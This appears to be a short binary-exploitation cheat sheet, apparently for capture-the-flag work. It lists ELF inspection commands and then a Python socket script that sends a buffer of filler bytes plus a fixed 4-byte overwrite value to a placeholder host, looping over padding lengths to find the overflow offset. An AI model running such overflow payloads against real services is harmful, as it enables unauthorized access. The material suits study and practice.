Misc
General commands
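# Identify the file type (ELF class, architecture, dynamic/static linking, stripped or not).
file some-executable
# Report the binary's hardening properties (checksec covers RELRO, stack canary, NX, PIE).
checksec --file=some-executable
# Trace the system calls the program makes while it runs.
strace ./some-executable
# Trace the dynamic library calls the program makes (the original listed "rtrace",
# which is not a tool; ltrace is the library-call counterpart of strace).
ltrace ./some-executable
# Rewrite the ELF interpreter (program loader) path so the binary runs under the given ld.so.
patchelf --set-interpreter /lib/my-ld-linux.so.2 ./some-executable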
Exploit without pwntools
Basic python socket
import socket
import time
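def exploit(ip, port, x, *, timeout=None):
    """Send ``x`` filler bytes plus a fixed 4-byte suffix to ``ip:port`` and print the reply.

    Args:
        ip: Target host, as accepted by ``socket.connect`` (IPv4 address or hostname).
        port: TCP port to connect to.
        x: Number of ``b"A"`` filler bytes placed before the fixed suffix.
        timeout: Optional socket timeout in seconds. ``None`` keeps the original
            blocking behaviour, in which ``recv`` may wait indefinitely.

    Returns:
        None. Only the first reply chunk (at most 2048 bytes) is read; it is
        decoded as UTF-8 with undecodable bytes dropped, then printed.

    Raises:
        OSError: On connection or I/O failure. The socket is closed either way.
    """
    payload = b"A" * x + b"\xb3\xba\x37\x13"
    # `with` guarantees close() even when connect()/sendall()/recv() raises;
    # the original only reached s.close() on the success path and leaked the
    # descriptor otherwise (one per failed probe when called in a loop).
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        if timeout is not None:
            s.settimeout(timeout)
        s.connect((ip, port))
        time.sleep(0.3)  # short pause before sending, kept from the original
        s.sendall(payload + b"\n")
        print(s.recv(2048).decode(errors="ignore"))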
# Probe the target once per filler length from 44 up to 79 inclusive
# (range() excludes its end value); each call prints the service's reply.
for pad_len in range(44, 80):
    exploit("x.x.x.x", 8080, pad_len)